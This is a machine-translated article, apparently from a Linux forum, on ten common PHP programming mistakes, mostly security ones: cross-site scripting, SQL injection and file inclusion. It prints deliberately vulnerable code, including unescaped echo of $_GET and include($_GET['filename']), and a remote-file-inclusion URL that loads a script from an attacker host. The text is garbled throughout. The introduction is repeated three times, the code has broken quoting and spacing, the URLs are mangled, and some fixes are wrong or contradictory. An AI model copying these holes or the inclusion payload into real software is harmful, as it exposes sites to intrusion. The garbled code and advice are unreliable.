10 Common Errors for php programmers

Welcome to the Linux community forum and interact with 2 million technical staff. When we use php for development, we often make such errors inadvertently, in addition, some mistakes are often made. The following lists the top 10 mistakes that PHP programmers often make, most of which are related to security. Let's see what you have done: 1. Don't turn to htmlentities 1

Welcome to the Linux community forum and interact with 2 million technical staff> when we use php for development, we often make such errors inadvertently, in addition, some mistakes are often made. The following lists the top 10 mistakes that PHP programmers often make, most of which are related to security. Let's see how you have made several mistakes: 1. Don't turn to html entities 1.

Welcome to the Linux community forum and interact with 2 million technicians>

When we use php for development, we often make such errors inadvertently, and some errors are often made. The following lists the 10 mistakes that PHP programmers often make, most of them are security-related. Let's see how you have made several mistakes:

1. Do not translate html entities

A basic knowledge: All untrusted input (especially the data submitted by the user from the form) must be converted before output.

Echo $ _ GET ['usename'];

This example may be output:

Script/* script for admin password change or cookie setting */script

This is an obvious security risk, unless you ensure that your users are correct.

How to fix:

We need to convert "<", ">", "and" to correct HTML representation (<,> ', and "), functions htmlspecialchars and htmlentities () this is exactly what we did.

The correct method is echo htmlspecialchars ($ _ GET ['username'], ENT_QUOTES );

2. Ignore SQL input

I have discussed this problem in the simplest way to prevent SQL Injection in an article (in php + mysql) and provided a simple method. Someone told me that they are already in php. set magic_quotes to On in ini, so you don't have to worry about this, but not all input is obtained from $ _ GET, $ _ POST or $ _ COOKIE!

How to fix:

Like in the simplest method to prevent SQL injection (in php + mysql), I recommend using the mysql_real_escape_string () function.

Correct practice:

$ SQL = "UPDATE users SET

Name = '. mysql_real_escape_string ($ name ). '

WHERE id = '. mysql_real_escape_string ($ id ). '";

Mysql_query ($ SQL );

?>

3. the HTTP-header-related functions are used incorrectly: header (), session_start (), and setcookie ()

Have you ever encountered this warning? "Warning: Cannot addheader information-headers already sent […]

Each time you download a webpage from the server, the server's output is divided into two parts: the header and the body.

The header contains some non-visual data, such as cookie. the header always arrives first. The body contains visualized html, images, and other data.

If output_buffering is set to Off, all HTTP-header-related functions must be called before output. The problem is that when you develop data in one environment and deploy the data in another environment, the output_buffering settings may be different. The result is switched to stopped. The cookie and session are not properly set ......

How to fix:

Make sure that the http-header-related function is called before the output, and make output_buffering = Off

4. Insecure data is used for Require or include files.

Again, do not trust data that is not explicitly declared by yourself. Do not Include or require files obtained from $ _ GET, $ _ POST, or $ _ COOKIE.

For example:

Index. php

// Including header, config, database connection, etc

Include ($ _ GET ['filename']);

// Including footer

?>

Now any hacker can use: http://www.yourdomain.com/index.php? Filenamepolicanyfile.txt

To obtain your confidential information or execute a PHP script.

If allow_url_fopen = On, you are even more dead:

Try this input: .yourdomain.com/index .... N.com % 2Fphphack. php

Now your webpage contains the output of youaredoomed.com/phphack.php. Hackers can send spam, change passwords, and delete files. As long as you can get it.

How to fix:

You must control which files can be included in the include or require command.

The following is a quick but incomplete solution:

// Include only files that are allowed.

$ AllowedFiles = array('file1.txt', 'file2.txt', 'file3.txt ');

If (in_array (string) $ _ GET ['filename'], $ allowedFiles )){

Include ($ _ GET ['filename']);

}

Else {

Exit ('not allowed ');

}

?>

5. Syntax Error

Syntax errors include all lexical and syntax errors, which are so common that I have to list them here. The solution is to carefully study the PHP syntax and avoid missing a bracket, braces, semicolons, and quotation marks. There is another way to change the editor, so don't use Notepad!

6. Rarely used or not object-oriented

Many projects do not use PHP's object-oriented technology. As a result, code maintenance becomes very time-consuming and labor-consuming. PHP supports more and more Object-oriented technologies, and it is getting better and better. We have no reason not to use object-oriented technology.

7. Do not use the framework

95% of PHP projects are doing the same four things: Create, edit, list, and delete. Now there are many MVC frameworks to help us complete these four things. Why don't we use them?

8. I do not know the existing functions in PHP.

The core of PHP contains many functions. Many programmers repeatedly invent the wheel. A lot of time is wasted. Search for PHP mamual Before encoding, and search for it on google. There may be new discoveries! Exec () in PHP is a powerful function that can execute cmd shell and return the last line of the execution result as a string. For security considerations, you can use EscapeShellCmd ()

9. Use the old version of PHP

Many programmers are still using PHP4. The development on PHP4 cannot fully utilize the potential of PHP, and there are still some security risks. It does not take a lot of effort to go to PHP5. Most PHP4 programs can be migrated to PHP5 as long as few statements are modified or even no changes are required.

Only 12% of PHP servers use PHP5, so 88% of PHP developers are still using PHP4.

10. quote the quotation marks twice.

Have you ever seen a webpage *** current \ 'or? This is usually because magic_quotes is set to off in the developer's environment, and magic_quotes = on. PHP will repeatedly run addslashes () on the data in GET, POST, and COOKIE on the deployed server ().

Original text:

It's a string

Magic quotes on:

It \'s a string

Run again

Addslashes ():

It \'s a string

HTML output:

It \'s a string

Another case is that the user entered the wrong login information at the beginning. After the server detects the wrong input, the same form is output and the user needs to input it again, causing the user's input to be converted twice!